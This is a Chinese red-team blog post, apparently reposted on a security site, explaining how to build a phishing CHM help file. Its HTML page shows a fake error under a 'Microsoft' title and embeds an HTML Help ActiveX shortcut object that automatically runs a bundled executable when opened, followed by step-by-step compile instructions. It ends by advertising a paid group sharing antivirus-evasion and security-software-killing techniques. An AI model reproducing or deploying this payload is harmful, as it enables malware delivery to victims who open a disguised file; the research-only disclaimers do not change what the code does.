【红队思路】chm下钓鱼利用

admin 2025年5月15日17:43:19评论4 views字数 1121阅读3分44秒阅读模式
0x01 声明
本文所涉及的技术、思路和工具仅用于安全测试和防御研究,切勿将其用于非法入侵或攻击他人系统等目的,一切后果由使用者自行承担!!!
0x02 chm安装
MSI Wrapper下载地址:https://www.exemsi.com/download/
0x03 chm制作

1、安装完成后可以在Windows的最近添加中找到程序进行打开

【红队思路】chm下钓鱼利用

2、新建html文件,里面编写我们的上线命令

index.html

<!DOCTYPE html><html><head><title>Microsoft</title><head></head><body>文件出现错误! <OBJECTid=xclassid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"width=1height=1>    <PARAMname="Command"value="ShortCut">    <PARAMname="Button"value="Bitmap::shortcut">    <PARAMname="Item1"value=',Microsoft.exe'>  <!-- 要执行的命令 -->    <PARAMname="Item2"value="273,1,1">    <!-- 触发方式 --></OBJECT><SCRIPT>    x.Click();  <!-- 自动触发 --></SCRIPT>
【红队思路】chm下钓鱼利用

3、新建一个空hhp文件,打开File -> New

【红队思路】chm下钓鱼利用

4、点击 OK,下一步

【红队思路】chm下钓鱼利用

5、下一步

【红队思路】chm下钓鱼利用

6、点击 Browse,选择新建的空hhp文件,下一步

【红队思路】chm下钓鱼利用

7、点击 是Y,下一步

【红队思路】chm下钓鱼利用

8、选择 HTML,下一步

【红队思路】chm下钓鱼利用

9、点击 Add,选择刚创建的html文件,下一步完成即可

【红队思路】chm下钓鱼利用
【红队思路】chm下钓鱼利用

10、打开File ->Compile,点击Compile进行编译

【红队思路】chm下钓鱼利用

11、点击Compile完成编译chm文件

【红队思路】chm下钓鱼利用
【红队思路】chm下钓鱼利用
0x04 红蓝偶像练习生小圈子
圈子主要研究方向红蓝对抗、钓鱼手法思路、武器化操作,红队工具二开与免杀。圈内不定期分享红队技术文章,攻防经验总结,学习笔记以及自研工具与插件,目前圈子已满100人。
圈子目前更新相关技术文章:
  • HeavenlyBypassAV内部版
  • 自启动思路
  • 红队场景下lnk钓鱼Bypass国内AV
  • LNK钓鱼图标自适应制作
  • lnk钓鱼思路视频讲解
  • lnk钓鱼Bypass某擎
  • Kill360核晶
  • AV对抗-致盲AV(核晶)
  • kill火绒
  • 火绒6.0内存免杀
  • Defender分离免杀
  • Defender知识点
  • HeavenlyProtectionCS内部CS插件
  • 捆绑免杀360
  • Fscan免杀核晶
  • QVM解决思路
  • 红队思路-钓鱼环境下小窗口截屏窃取
  • 免杀Todesk/向日葵读取工具
  • 还有更多红队思路文章!期待您的加入!!!
【红队思路】chm下钓鱼利用
【红队思路】chm下钓鱼利用
【红队思路】chm下钓鱼利用

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年5月15日17:43:19
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【红队思路】chm下钓鱼利用https://cn-sec.com/archives/4068510.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息